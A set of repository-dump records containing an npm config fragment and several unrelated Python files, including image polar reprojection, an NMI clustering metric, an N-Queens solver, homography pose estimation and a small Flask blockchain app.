"node_unsafe_optimizations": 0,
"node_use_dtrace": "false",
"node_use_etw": "false",
"node_use_openssl": "true",
"node_use_perfctr": "false",
"node_use_systemtap": "false",
"python": "/data/opt/bin/python",
"target_arch": "x64",
"v8_enable_gdbjit": 0,
"v8_no_strict_aliasing": 1,
"v8_use_snapshot": "false",
"want_separate_host_toolset": 0,
"nodedir": "/home/maverick/.node-gyp/0.10.30",
"copy_dev_lib": "true",
"standalone_static_library": 1,
"cache_lock_stale": "60000",
"sign_git_tag": "",
"user_agent": "npm/1.4.21 node/v0.10.30 linux x64",
"always_auth": "",
"bin_links": "true",
"key": "",
"description": "true",
"fetch_retries": "2",
"heading": "npm",
"user": "1000",
"force": "",
"cache_min": "10",
"init_license": "ISC",
"editor": "vi",
"rollback": "true",
"cache_max": "Infinity",
"userconfig": "/home/maverick/.npmrc",
"engine_strict": "",
"init_author_name": "",
"init_author_url": "",
"tmp": "/tmp",
"depth": "Infinity",
"save_dev": "",
"usage": "",
"cafile": "",
"https_proxy": "",
"onload_script": "",
"rebuild_bundle": "true",
"save_bundle": "",
"shell": "/bin/bash",
"prefix": "/usr/local",
"registry": "https://registry.npmjs.org/",
"browser": "",
"cache_lock_wait": "10000",
"save_optional": "",
"searchopts": "",
"versions": "",
"cache": "/home/maverick/.npm",
"ignore_scripts": "",
"searchsort": "name",
"version": "",
"local_address": "",
"viewer": "man",
"color": "true",
"fetch_retry_mintimeout": "10000",
"umask": "18",
"fetch_retry_maxtimeout": "60000",
"message": "%s",
"ca": "",
"cert": "",
"global": "",
"link": "",
"save": "",
"unicode": "true",
"long": "",
"production": "",
"unsafe_perm": "",
"node_version": "0.10.30",
"tag": "latest",
"git_tag_version": "true",
"shrinkwrap": "true",
"fetch_retry_factor": "10",
"npat": "",
"proprietary_attribs": "true",
"save_exact": "",
"strict_ssl": "true",
"username": "",
"dev": "",
"globalconfig": "/usr/local/etc/npmrc",
"init_module": "/home/maverick/.npm-init.js",
"parseable": "",
"globalignorefile": "/usr/local/etc/npmignore",
"cache_lock_retries": "10",
"save_prefix": "^",
"group": "1000",
"init_author_email": "",
"searchexclude": "",
"git": "git",
"optional": "true",
"email": "",
"json": "",
"spin": "true"
}
}
|
[
"guanhao3797@gmail.com"
] |
guanhao3797@gmail.com
|
3715d582eda0e08ee9b12fe4425c41b8a4861879
|
61930bf19a6c271a021cc105f1edbb8f86dbb337
|
/maximus48/polar.py
|
3e0a8f033acc15b7bbe13a8c2b2fcf4b75527328
|
[
"MIT"
] |
permissive
|
maximka48/XIMG-EMBL
|
50d5b9c3c138f4ea403658507c24993bf82fbcf3
|
0178822dfbf4b1a249d510030b21fca28d51d2c0
|
refs/heads/master
| 2022-03-24T15:57:37.729211
| 2021-11-20T14:31:00
| 2021-11-20T14:31:00
| 234,130,531
| 2
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,555
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue May 7 14:58:53 2019
@author: mpolikarpov
"""
import numpy as np
import matplotlib.pyplot as plt
import scipy
import cv2
class polar_image:
'''
description
'''
# =============================================================================
# def __init__(self, data, origin = None):
# """Constructor"""
# self.data = data
# self.origin = origin
# =============================================================================
def __init__(self):
"""Constructor"""
pass
# =============================================================================
# some functions for polar interpolation
# =============================================================================
def plot_polar_image(self, data, origin=None):
"""Plots an image reprojected into polar coordinages with the origin
at "origin" (a tuple of (x0, y0), defaults to the center of the image)"""
polar_grid, r, theta = self.reproject_image_into_polar(data, origin)
plt.figure()
plt.imshow(polar_grid, extent=(theta.min(), theta.max(), r.max(), r.min()))
plt.axis('auto')
plt.ylim(plt.ylim()[::-1])
plt.xlabel('Theta Coordinate (radians)')
plt.ylabel('R Coordinate (pixels)')
plt.title('Image in Polar Coordinates')
def index_coords(self, data, origin=None):
"""Creates x & y coords for the indicies in a numpy array "data".
"origin" defaults to the center of the image. Specify origin=(0,0)
to set the origin to the lower left corner of the image."""
ny, nx = data.shape[:2]
if origin is None:
origin_x, origin_y = nx // 2, ny // 2
else:
origin_x, origin_y = origin
x, y = np.meshgrid(np.arange(nx), np.arange(ny))
x -= origin_x
y -= origin_y
return x, y
def cart2polar(self, x, y):
r = np.sqrt(x**2 + y**2)
theta = np.arctan2(y, x)
return r, theta
def polar2cart(self, r, theta):
x = r * np.cos(theta)
y = r * np.sin(theta)
return x, y
def reproject_image_into_polar(self, data, origin=None):
"""Reprojects a 3D numpy array ("data") into a polar coordinate system.
"origin" is a tuple of (x0, y0) and defaults to the center of the image."""
# horizontal direction on the image will be theta coordinate
#(with 0 in the image center), vertical - R coordinate (with 0 in left top corner)
data = cv2.merge([data,data,data])
ny, nx = data.shape[:2]
if origin is None:
origin = (nx//2, ny//2)
# Determine that the min and max r and theta coords will be...
x, y = self.index_coords(data, origin=origin)
r, theta = self.cart2polar(x, y)
# Make a regular (in polar space) grid based on the min and max r & theta
r_max = int(round(np.sqrt((nx//2)**2 + (ny//2)**2)))
r_i = np.linspace(r.min(), r.max(), r_max)
theta_i = np.linspace(theta.min(), theta.max(), 360)
theta_grid, r_grid = np.meshgrid(theta_i, r_i)
# Project the r and theta grid back into pixel coordinates
xi, yi = self.polar2cart(r_grid, theta_grid)
xi += origin[0] # We need to shift the origin back to
yi += origin[1] # back to the lower-left corner...
xi, yi = xi.flatten(), yi.flatten()
coords = np.vstack((xi, yi)) # (map_coordinates requires a 2xn array)
# Reproject each band individually and the restack
# (uses less memory than reprojection the 3-dimensional array in one step)
bands = []
for band in data.T:
zi = scipy.ndimage.map_coordinates(band, coords, order=1)
bands.append(zi.reshape((r_max, 360)))
output = np.dstack(bands)
return output#, r_i, theta_i
def baseline(self, data1D, polynom = 5):
'''
substract the baseline from 2D curve
'''
x = np.linspace(0, data1D.shape[0], len(data1D), dtype = 'uint16')
y = data1D
pfit = np.polyfit(x, y, polynom) # returns polynomial coefficients
yp = np.polyval(pfit, x) # fits the curve,
smoothed = data1D - yp # subtract baseline
return smoothed
|
[
"mpolikarpov@embl-hamburg.de"
] |
mpolikarpov@embl-hamburg.de
|
83069894a76b2d3a5e4b915aa5beeb0470266310
|
ae674db34a41ed4748208d7fc255302352aed2cb
|
/NMI_calculation/NMI_calculation.py
|
e7226c8e22a612aeaca2f83490bb2b21098167f6
|
[] |
no_license
|
zhang134/OTUs_clustering
|
4dd676957ee8b5476a2c877b3a3856e94a4bd802
|
ec0e15d14073178d5edae8dc7685ed516b70b64b
|
refs/heads/main
| 2023-03-03T11:11:10.938624
| 2021-02-03T06:33:09
| 2021-02-03T06:33:09
| 302,034,277
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,927
|
py
|
import math
import sys
import os
import getopt
def readList(listfile):
goldDict={}
testDict={}
readsNum=0
for line in open(listfile,'r'):
readsNum+=1
lineList=line.strip().split()
if len(lineList) != 3:
print "***There is an error in input file, at %d row.\nthree column that separated by tab is requred.***"
sys.exit(1)
seqname=lineList[0]
specie=lineList[1]
cluster=lineList[2]
#insert to gold dictionary
goldList=goldDict.get(specie,[])
goldList.append(seqname)
goldDict[specie]=goldList
#insert test dictionary
testList=testDict.get(cluster,[])
testList.append(seqname)
testDict[cluster]=testList
return goldDict,testDict,readsNum
def NMIcalculater(listfile):
goldDict,testDict,readsNum=readList(listfile)
I_value=0
Hs_value=0
Hc_value=0
N=float(readsNum) #number of all reads
#H(C)
for cluster in testDict:
clusterSeq=testDict[cluster]
Cj=float(len(clusterSeq))
sub_Hc=-((Cj/N)*math.log(Cj/N))
Hc_value+=sub_Hc
#H(S)
for specie in goldDict:
specieSeq=goldDict[specie]
Si=float(len(specieSeq))
sub_Hs=-Si/N*math.log(Si/N)
Hs_value+=sub_Hs #H(S)
#I(S,C)
for specie in goldDict:
specieSeq=goldDict[specie]
Si=float(len(specieSeq))
for cluster in testDict:
clusterSeq=testDict[cluster]
intersection=list(set(specieSeq).intersection(set(clusterSeq)))
if len(intersection)==0:
continue
Aij=float(len(intersection))
Cj=float(len(clusterSeq))
subI_log=math.log((Aij/N)/((Si*Cj)/(N*N)))
sub_I=(Aij/N)*subI_log
I_value+=sub_I
NMI_value=(2*I_value)/(Hs_value+Hc_value)
return NMI_value
if __name__=="__main__":
usage="""usage: python NMI_caculation.py --input <inputfile>
--input/-i the list file (three column separated by tab) for all sequence names. The first column is the sequence names, the second column is the species, and third column is the cluster names.
--help/-h help
"""
opts,arg=getopt.getopt(sys.argv[1:],"i:h:",['input=','help='],)
parameters=[a[0] for a in opts]
if '-h' in parameters or '--help' in parameters:
print usage
sys.exit(1)
if len(parameters)==0:
print usage
sys.exit(1)
if '-i' not in parameters and '--input' not in parameters:
print "***Error, a input file is requred.***\n"
print usage
sys.exit(1)
#
for i,a in opts:
if i in ("--input","-i"):
if not os.path.isfile(a):
print "***%s is not found.***"%(a)
print usage
sys.exit(1)
inputfile=a
nmi=NMIcalculater(inputfile)
print "\nNMI value: %f\n"%(nmi)
|
[
"noreply@github.com"
] |
zhang134.noreply@github.com
|
e832b19f088e3c07c3bc1040ffe8704174b85fcd
|
0f56f4692bdfacb7adda41786718df480fc949fe
|
/nQueens.py
|
c34e1fec2cd05871b4da8aab24afbf791896d81a
|
[] |
no_license
|
freephys/CodingPractice
|
ca4ee5a2d8701934cfd6d4c2b15e7e00d58a2064
|
dee421a78fdea5f6a695ae2423383f4a21f98e32
|
refs/heads/master
| 2023-07-11T18:27:29.761786
| 2021-08-13T01:54:04
| 2021-08-13T01:54:04
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 562
|
py
|
def nQueens(n):
res = []
def isValid(offset, cur):
for i in range(offset):
diff = abs(cur[offset] - cur[i])
if diff == 0 or diff == offset - i:
return False
return True
def helper(offset, cur):
if offset == n:
res.append(cur.copy())
return
for i in range(1, n + 1):
cur[offset] = i
if isValid(offset, cur):
helper(offset + 1, cur)
cur[offset] = 0
cur = [0] * n
helper(0, cur)
return res
|
[
"mengzhehuang@gmail.com"
] |
mengzhehuang@gmail.com
|
80994cabe8186bfede033958693fb604306b5a42
|
f0d46d6647e9bae4da0d0b5328e869263ff7e008
|
/Exercise3/main.py
|
30c7ab902e595361dffc9acf3734a34d247f9e3c
|
[
"MIT"
] |
permissive
|
Gruppe3VDL/3D_computer_vision
|
5d06b49ac00b1b601fb7c78c53f558a7ab741c33
|
9f49055db096983624c65b4240d7852a29a3f850
|
refs/heads/master
| 2020-09-05T04:53:59.590062
| 2019-12-22T13:31:12
| 2019-12-22T13:31:12
| 219,987,749
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,817
|
py
|
import os
import sys
import numpy as np
import cv2 as cv
import scipy.io as io
from collections import OrderedDict
import copy
def build_k_matrix(data):
k= np.array([[data['alpha_x'][0,0], data['s'][0,0],data['x_0'][0,0]],
[0, data['alpha_y'][0,0], data['y_0'][0,0]],
[0,0,1]])
return np.array(k)
def is_orthogonal(R):
I = np.abs(R.dot(R.T))
cond = np.allclose(I, np.eye(3), atol=0.001)
return cond
def correct_error(R):
u, s, vh = np.linalg.svd(R, full_matrices=True)
R = u.dot(vh)
return R
def compute_relative_rotation():
base_folder = './data/'
data = io.loadmat(base_folder + 'ex3.mat')
K = build_k_matrix(data)
K_inv = np.linalg.inv(K)
H_arr = [data["H1"], data["H2"]]
for i in range(0, len(H_arr)):
print("Computing rotation from homography for H"+str(i+1)+":")
H = H_arr[i]
print("Homography Matrix:")
print(H)
E = K_inv.dot(H)
R = np.ones((3,3))
R[:,0:2]= E[:,0:2]
# Normalize R1, R2
norm_factor = (np.linalg.norm(R[:,0]) + np.linalg.norm(R[:,1])) / 2
R[:, 0] /= norm_factor
R[:, 1] /= norm_factor
R[:,-1 ]= np.cross(R[:,0].T, R[:,1].T)
print("Computed Rotation Matrix from Homography is:")
print(R)
print("Is this orthogonal?")
if not is_orthogonal(R):
print("NO. Making orthogonal...")
R = correct_error(R)
print("Test R.dot(R.T)==I again. Is it passed?:", is_orthogonal(R))
print("Rrel for H" + str(i+1)+ " is:")
print(R)
else:
print("YES.")
print("then Rrel for H"+str(i+1)+" is:")
print(R)
print("----------------------------------------")
def compute_pose():
base_folder = './data/'
data = io.loadmat(base_folder + 'ex3.mat')
H3_Homography = data['H3']
x_0=data['x_0']
y_0=data['y_0']
alpha_x=data['alpha_x']
alpha_y=data['alpha_y']
s=data["s"]
K_matrix=[[alpha_x[0][0],s[0][0],x_0[0][0]],
[0,alpha_y[0][0],y_0[0][0]],
[0,0,1]]
K_inverse=np.linalg.inv(K_matrix)
Projection_matrix=np.matmul(K_inverse,H3_Homography)
Projection_matrix=np.matmul(Projection_matrix,K_matrix)
r_1=Projection_matrix[:,0]
r_2=Projection_matrix[:,1]
mag_r1 = np.linalg.norm(r_1)
mag_r2 = np.linalg.norm(r_2)
lambda_=(mag_r1+mag_r2)/2
r_1/=lambda_
r_2/=lambda_
r_3=np.cross(r_1,r_2)
translation=Projection_matrix[:,2]
translation/=lambda_
Rotation_matrix=np.column_stack((r_1,r_2,r_3))
print("Rotation Matrix",Rotation_matrix)
print("translation",translation)
print("----------------------------------------")
print("Question 3")
print("----------------------------------------")
compute_relative_rotation()
print("----------------------------------------")
print("Question 4")
print("----------------------------------------")
compute_pose()
|
[
"gulzainali@gmail.com"
] |
gulzainali@gmail.com
|
ddcbfea5a49f0411ebd847c047042c242258c2da
|
7330d978b8cb994fbfca5a64acd4984b86cdf6b5
|
/lib/export.py
|
cf91210e98045b88b010c07b987be958fef62113
|
[] |
permissive
|
pooyadav/lib-python-databox
|
a1afd9de0c111ae576805f281a1cab806526a739
|
25b4670d3c5706708b4d2bf8badea5c625232e78
|
refs/heads/master
| 2022-02-18T03:01:00.880166
| 2019-09-17T12:39:19
| 2019-09-17T12:39:19
| 105,249,434
| 0
| 0
|
MIT
| 2019-08-12T11:53:51
| 2017-09-29T08:34:36
|
Python
|
UTF-8
|
Python
| false
| false
| 559
|
py
|
import lib.utils as utils
import os
import json
try:
if "DATABOX_EXPORT_SERVICE_ENDPOINT" in os.environ:
exportServiceURL = os.environ['DATABOX_EXPORT_SERVICE_ENDPOINT']
except NameError:
print("Export service endpoint is not defined")
exportServiceURL=''
def longpoll(destination, payload):
newurl = exportServiceURL + '/lp/export'
return utils.makeStoreRequest(method = 'POST', jsonData = {'id': '', 'uri': destination, 'data': json.dump(payload)}, url=newurl)
def queue(href, key, data):
raise NotImplementedError
|
[
"py236@cam.ac.uk"
] |
py236@cam.ac.uk
|
3f92164670a5ea304825542ef150a9ac09c4c1b3
|
eedf9ef8437800116171f99689df4c0f28a67e93
|
/DjangoTest/urls.py
|
86e247af94b1848cfedf8b65fab91c73da6c234c
|
[] |
no_license
|
hiCyoung/DjangoTest
|
08f28d72049798ca2f28bc012e746820e652a2ed
|
dabb6b2527fae3e1228654035dc63fce3ce83257
|
refs/heads/master
| 2016-09-06T12:19:20.063794
| 2013-06-24T01:49:50
| 2013-06-24T01:49:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 681
|
py
|
from django.conf.urls import patterns, include, url
# Uncomment the next two lines to enable the admin:
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'DjangoTest.views.home', name='home'),
# url(r'^DjangoTest/', include('DjangoTest.foo.urls')),
# Uncomment the admin/doc line below to enable admin documentation:
url(r'^admin/doc/', include('django.contrib.admindocs.urls')),
# Uncomment the next line to enable the admin:
url(r'^admin/', include(admin.site.urls)),
url(r'^$','Test.views.hello', name='home'),
url(r'^hello/(\d{1,2})/(\d{1,2})/$','Test.views.test', name='home'),
)
|
[
"328491755@qq.com"
] |
328491755@qq.com
|
a9e7f9d118621d4c456b471b3521436e8bfc7d72
|
18e605d36d54c0f5178bda2139cd561d3a0ea057
|
/crystfeler/py/json2center.py
|
1bca08c9083a318196a13724f465bb3f0016e784
|
[] |
no_license
|
vachram97/still-utils
|
756fb6fa57aa9deb78979182439e8f66b1415408
|
34f2ec16afb1ea9a92c258087f13209710daca28
|
refs/heads/master
| 2020-12-29T05:07:37.425716
| 2020-09-14T17:05:39
| 2020-09-14T17:05:39
| 238,465,071
| 0
| 0
| null | 2020-02-05T14:08:03
| 2020-02-05T14:08:02
| null |
UTF-8
|
Python
| false
| false
| 7,751
|
py
|
#!/usr/bin/env python3
import numpy as np
import json
import sys
import argparse
from tqdm import tqdm
from typing import List, Tuple
from itertools import combinations
import matplotlib.pyplot as plt
import warnings
def moving_average(arr: np.ndarray, window_size: int) -> np.ndarray:
"""
Return moving average of 1D array in numpy
Arguments:
arr {np.ndarray} -- input array
window_size {int} -- window size
Returns:
ret {np.ndarray} -- smoothened array
"""
ret = np.cumsum(arr, dtype=float)
ret[window_size:] = ret[window_size:] - ret[:-window_size]
return ret[window_size - 1 :] / window_size
def rms_mask(arr: np.ndarray, window_size: int, percentile=0.1) -> np.ndarray:
"""
Return mask where arr's deviation is smaller than it's mean*percentile:
RMSD[arr]_window_size < MEAN[arr]*percentile
Arguments:
arr {np.ndarray} -- input array
window_size {int} -- window size
Returns:
np.ndarray -- boolean mask
"""
arr_mean = moving_average(arr, window_size)
arr_rmsd = np.power(moving_average(np.power(arr, 2), window_size), 0.5)
return np.where(np.abs(arr_rmsd) < np.abs(arr_mean) * percentile)
def radial_binning(
fs: np.ndarray, ss: np.ndarray, rs: np.ndarray, N=1000
) -> np.ndarray:
"""
Returns binned by radius table
Arguments:
fs {np.ndarray} -- np.ndarray of x values
ss {np.ndarray} -- np.ndarray of y values
rs {np.ndarray} -- np.ndarray of r values
Keyword Arguments:
N {int} -- number of bins (default: {1000})
Returns:
answ {np.ndarray} -- (len(fs), 4) shape: rmean, num, fsmean, ssmean
"""
rmin, rmax = rs.min(), rs.max()
step = (rmax - rmin) / N
answ = []
for rcur, _ in tqdm(
enumerate(np.linspace(rmin, rmax, N)), desc="Binning values", total=N
):
mask = (rs < rcur + step) & (rs >= rcur)
if sum(mask) > 0:
rmean = rs[mask].mean()
num = mask.sum()
fsmean = fs[mask].mean()
ssmean = ss[mask].mean()
answ.append([rmean, num, fsmean, ssmean])
answ = np.array(answ)
return answ
def ang(v1, v2):
"""
Returns angle between two vectors
"""
return np.abs(np.arccos(np.dot(v1, v2) / np.linalg.norm(v1) / np.linalg.norm(v2)))
def is_inside(triangle: np.ndarray, point: np.ndarray) -> bool:
"""
Checks whether point is inside a triangle
Arguments:
triangle {np.pdarray} -- triangle coordinates (3,2) shape
point {np.ndarray} -- point to check (x,y)
Returns:
bool -- check value
"""
a, b, c = triangle
oa, ob, oc = a - point, b - point, c - point
return (
np.abs(
sum([ang(v1, v2) for v1, v2 in combinations([oa, ob, oc], 2)]) - 2 * np.pi
)
< 1e-2
)
def get_center_position_from_binning(
binning: np.ndarray, rmin=None, rmax=None
) -> Tuple[Tuple[float, float], Tuple[float, float]]:
"""
Estimate center position from binning results
Arguments:
binning {np.ndarray} -- input (N,4) shape array
Keyword Arguments:
rmin {[type]} -- lower radius threshold (default: {None})
rmax {[type]} -- upper radius threshold (default: {None})
Returns:
Tuple[Tuple[float, float], Tuple[float, float]] -- (fs, ss) tuple
"""
rs, num, fs, ss = binning.T
if rmin is None:
rmin = float("-inf")
if rmax is None:
rmax = float("inf")
mask = (rs >= rmin) & (rs < rmax)
fs_val, fs_std = fs[mask].mean(), fs[mask].std()
ss_val, ss_std = ss[mask].mean(), ss[mask].std()
return (fs_val, fs_std), (ss_val, ss_std)
def circle(points: np.ndarray, acute_angle=True, presumable_centre=None) -> np.ndarray:
"""
Returns coordinates and radius of circumscribed circle for 3 points.
Arguments:
points {np.ndarray} -- (3,2)-shaped array
Keyword Arguments:
acute_angle {bool} -- whether the points should be an acute-anbled triangle (default: {True})
presumable_centre {np.ndarr} -- approximate centre position to check whether it's inside triangle of points
Returns:
np.ndarray -- (x,y,R)
"""
x1, y1, x2, y2, x3, y3 = points.reshape(-1,)
A = np.array([[x3 - x1, y3 - y1], [x3 - x2, y3 - y2]])
Y = np.array(
[
(x3 ** 2 + y3 ** 2 - x1 ** 2 - y1 ** 2),
(x3 ** 2 + y3 ** 2 - x2 ** 2 - y2 ** 2),
]
)
if acute_angle:
if not is_inside(points, points.mean(axis=0)):
return None
if presumable_centre is not None:
if not is_inside(points, presumable_centre):
return None
if np.abs(np.linalg.det(A)) < 1e-3:
return None
Ainv = np.linalg.inv(A)
X = 0.5 * np.dot(Ainv, Y)
x, y = X[0], X[1]
r = np.sqrt((x - x1) ** 2 + (y - y1) ** 2)
return (x, y, r)
def main(args: List[str]):
"""
The main function
Arguments:
args {List[str]} -- arguments
"""
parser = argparse.ArgumentParser(
description="Detector center search, based on random selection of circumscribed circle centers"
)
parser.add_argument(
"--iterations",
type=int,
default=10000,
help="Number of times algorithm will try to guess center choosing 3 random points",
)
parser.add_argument(
"input_json", type=str, help="input json file, produced by streampeaks2json.py",
)
parser.add_argument(
"--rmin", type=int, default=None, help="Minimum radius for center estimation"
)
parser.add_argument(
"--rmax", type=int, default=None, help="Maximum radius for center estimation"
)
parser.add_argument(
"--center_fs",
type=int,
default=None,
help="Presumable center fs for acute angle rejection",
)
parser.add_argument(
"--center_ss",
type=int,
default=None,
help="Presumable center ss for acute angle rejection",
)
parser.add_argument(
"--plot", help="Whether to save plots or not", action="store_true",
)
parser.add_argument(
"--nbins", type=int, default=1000, help="Number of bins for radial binning"
)
args = parser.parse_args()
with open(args.input_json) as f:
peaks = json.load(f)
number_of_panels = len(set([elem["panel"] for elem in peaks.values()]))
assert number_of_panels == 1, f"Wrong number of panels: {number_of_panels}"
points = np.array([(elem["fs"], elem["ss"]) for elem in peaks.values()])
if args.center_fs is not None and args.center_ss is not None:
presumable_centre = np.array([args.center_fs, args.center_ss])
else:
presumable_centre = None
answ = []
for _ in tqdm(range(args.iterations), desc="Sampling points"):
idx = np.random.randint(points.shape[0], size=3)
T = points[idx]
cur = circle(T, acute_angle=True, presumable_centre=presumable_centre)
if cur is not None:
answ.append(cur)
fs, ss, rs = np.array(answ).T
bins = radial_binning(fs, ss, rs, N=args.nbins)
if args.plot:
plt.plot(bins.T[0], bins.T[2], label="fs")
plt.plot(bins.T[0], bins.T[3], label="ss")
plt.xlim(args.rmin, args.rmax)
plt.savefig(f"{args.input_json}_plot.png", dpi=300)
print(f"Saved {args.input_json}_plot.png")
(fs, fs_s), (ss, ss_s) = get_center_position_from_binning(
bins, rmin=args.rmin, rmax=args.rmax
)
print(f"fs: {fs} +- {fs_s}; ss: {ss} +- {ss_s}")
if __name__ == "__main__":
if not sys.warnoptions:
warnings.simplefilter("ignore")
main(sys.argv[1:])
|
[
"marin@phystech.edu"
] |
marin@phystech.edu
|
945d4b45857ddcb47d20b1ccef7019f02c040f02
|
0dc2d6677fa38c0737e009d0576c74257315110d
|
/app.py
|
663c1de28ab8cecf83c2eb4bd56a6a2ba4a94e94
|
[] |
no_license
|
ysa23/blockchain
|
077778c283329f42e8cbed8e8a03db62e8b0c29b
|
ce2d91449e881f74edf2d52a5e4c4ef6d917f625
|
refs/heads/master
| 2021-08-16T01:29:22.298169
| 2017-11-18T19:54:06
| 2017-11-18T19:54:06
| 110,583,371
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,443
|
py
|
from textwrap import dedent
from flask import Flask, jsonify, request
from uuid import uuid4
from blockchain import Blockchain
app = Flask(__name__)
node_identifier = str(uuid4()).replace('-', '')
blockchain = Blockchain()
@app.route('/mine', methods=['GET'])
def mine():
last_block = blockchain.last_block
last_proof = last_block['proof']
proof = blockchain.proof_of_work(last_proof)
blockchain.new_transaction(sender="0", recipient=node_identifier, amount=1)
block = blockchain.new_block(proof=proof, previous_hash=last_block['previous_hash'])
response = {
'message': "New Block Forged",
'index': block['index'],
'transactions': block['transactions'],
'proof': block['proof'],
'previous_hash': block['previous_hash']
}
return jsonify(response), 200
@app.route('/transactions/new', methods=['POST'])
def new_transaction():
transaction = request.get_json()
required = ['sender', 'recipient', 'amount']
if not all(k in transaction for k in required):
return 'Missing values in transaction', 400
index = blockchain.new_transaction(transaction['sender'], transaction['recipient'], transaction['amount'])
response = {
'message': f'Transaction will be added to Block {index}'
}
return jsonify(response), 201
@app.route('/chain', methods=['GET'])
def full_chain():
response = {
'chain': blockchain.chain,
'length': len(blockchain.chain),
}
return jsonify(response), 200
@app.route('/nodes/register', methods['POST'])
def register_node():
values = request.get_json()
nodes = values.get('nodes')
if nodes is None:
return 'Error: please supply a list of nodes', 400
for node in nodes:
blockchain.register_node(node)
response = {
'message': 'New nodes have been added',
'total_nodes': list(blockchain.nodes),
}
return jsonify(response), 201
@app.route('/nodes/resolve', methods['GET'])
def consensus():
replaced = blockchain.resolve_conflicts()
if replaced:
response = {
'message': 'Our chain has been replaced',
'new_chain': blockchain.chain
}
else:
response = {
'message': 'Out chain is authoritative',
'chain': blockchain.chain
}
return jsonify(response), 200
if __name__ == '__main__':
app.run(host='0.0.0.0', port=5000)
|
[
"yossi@sears.co.il"
] |
yossi@sears.co.il
|
8d2bcd5d0667c194c2a3756cc75b8e871825893f
|
02ce427febaf19edd64b8fb07d0e442c56836225
|
/Week 3/Homework/Homework2.py
|
e83ee5214f5c4ece9053fe2b100d2913b42f1c79
|
[] |
no_license
|
joostecg/PH526x
|
95ca712877020317571d9da0802b8e1cd242984b
|
0d0fbee1d983f33e5cc528d7bcd30b2b3caac7eb
|
refs/heads/master
| 2021-01-25T08:06:35.813282
| 2017-06-08T05:46:15
| 2017-06-08T05:46:15
| 93,711,430
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,345
|
py
|
# Exercise 1
# Exercise 2
# Exercise 3
hamlets = ## Enter code here! ###
book_dir = "Books"
title_num = 1
for language in book_titles:
for author in book_titles[language]:
for title in book_titles[language][author]:
if title == "Hamlet":
inputfile = data_filepath+"Books/"+language+"/"+author+"/"+title+".txt"
text = read_book(inputfile)
distribution = ## Enter code here! ###
hamlets.loc[title_num] = language, distribution
title_num += 1
# Exercise 4
colors = ["crimson", "forestgreen", "blueviolet"]
handles, hamlet_languages = [], []
for index in range(hamlets.shape[0]):
language, distribution = hamlets.language[index+1], hamlets.distribution[index+1]
dist = more_frequent(distribution)
plot, = plt.loglog(sorted(list(dist.keys())),sorted(list(dist.values()),
reverse = True), color = colors[index], linewidth = 2)
handles.append(plot)
hamlet_languages.append(language)
plt.title("Word Frequencies in Hamlet Translations")
xlim = [0, 2e3]
xlabel = "Frequency of Word $W$"
ylabel = "Fraction of Words\nWith Greater Frequency than $W$"
plt.xlim(xlim); plt.xlabel(xlabel); plt.ylabel(ylabel)
plt.legend(handles, hamlet_languages, loc = "upper right", numpoints = 1)
# show your plot using `plt.show`!
|
[
"joostecg@gmail.com"
] |
joostecg@gmail.com
|
4500eb9123833c1245e3ab171d6fb8e92aa11c99
|
32a2fdbce84b5d7c312bbdd1b091cbe4a3ed3a89
|
/core/products/__init__.py
|
f10da071df84ce620478227026411e28181ceaaa
|
[] |
no_license
|
threedium/gridscale
|
e846ff1c74e9e329408cfcbec940cbdb23b92b02
|
cdeaa656cfbabf232a7aa163ec18dc314f14c2d9
|
refs/heads/master
| 2022-12-10T21:26:26.529206
| 2020-01-14T04:33:13
| 2020-01-14T04:33:13
| 228,313,354
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,406
|
py
|
#!/usr/bin/env python
#-*- coding: utf-8 -*-
from __future__ import (unicode_literals, print_function)
import os
import random
import string
from flask import (Blueprint, request, jsonify, make_response)
prod = Blueprint('prod', __name__)
from core import db
from core.models import (Products)
def create_products():
# create products from flat file
response = False
if os.path.isfile('prods.txt'):
prods = Products.query.all()
if len(prods) > 0:
response = True
else:
i = 0
with open('prods.txt') as f:
content=f.readlines()
content = [x.strip() for x in content]
for k in content:
prd = {}
# To avoid Auto-Increment issues with SQLite incl below code
# init += 1
# prd['product_id'] = init
prd['price_net'] = float(random.randint(1,50))
prd['name'] = k.replace(" ", "_")
prd['status'] = 'Active'
if len(k) > 0:
try:
if not i:
add_prd = Products(
product_id=231415161,
name=k.replace(" ", "_"),
price_net=random.randint(1,50),
status="Active"
)
else:
add_prd = Products(
# product_id=231415161,
name=k.replace(" ", "_"),
price_net=random.randint(1,50),
status="Active"
)
db.session.add(add_prd)
db.session.commit()
i += 1
except Exception as e:
return False
return response
@prod.route('/products', methods=['POST', 'GET'])
def products():
data = request.args.to_dict()
create_products()
if len(data) > 0:
# filter data (name or status)
product = None
if 'name' in data:
product = Products.query.filter(Products.name == data['name']).first()
elif 'status' in data:
product = Products.query.filter(Products.status == data['status']).first()
if product is None:
return make_response(" ", 404)
else:
obj = {
'product_id': product.product_id,
'name': product.name,
'price_net': "{0:.2f}".format(product.price_net),
'status': product.status
}
response = jsonify(obj)
response.status_code = 200
return response
else:
# return Products Obj
products = Products.query.all()
if len(products) > 0:
results = []
for product in products:
obj = {
'product_id': product.product_id,
'name': product.name,
'price_net': "{0:.2f}".format(product.price_net),
'status': product.status
}
results.append(obj)
response = jsonify(results)
response.status_code = 200
return response
|
[
"se.wanyama@gmail.com"
] |
se.wanyama@gmail.com
|
d5c5779cb06cd034955a358e57ccad53113de7b0
|
bfc25f1ad7bfe061b57cfab82aba9d0af1453491
|
/data/external/repositories/141822/AXA_Telematics-master/Features/modules_janto/featureFun.py
|
6077221b9a1eba16c0182067048fda6cda0a3b49
|
[
"MIT"
] |
permissive
|
Keesiu/meta-kaggle
|
77d134620ebce530d183467202cf45639d9c6ff2
|
87de739aba2399fd31072ee81b391f9b7a63f540
|
refs/heads/master
| 2020-03-28T00:23:10.584151
| 2018-12-20T19:09:50
| 2018-12-20T19:09:50
| 147,406,338
| 0
| 1
| null | null | null | null |
UTF-8
|
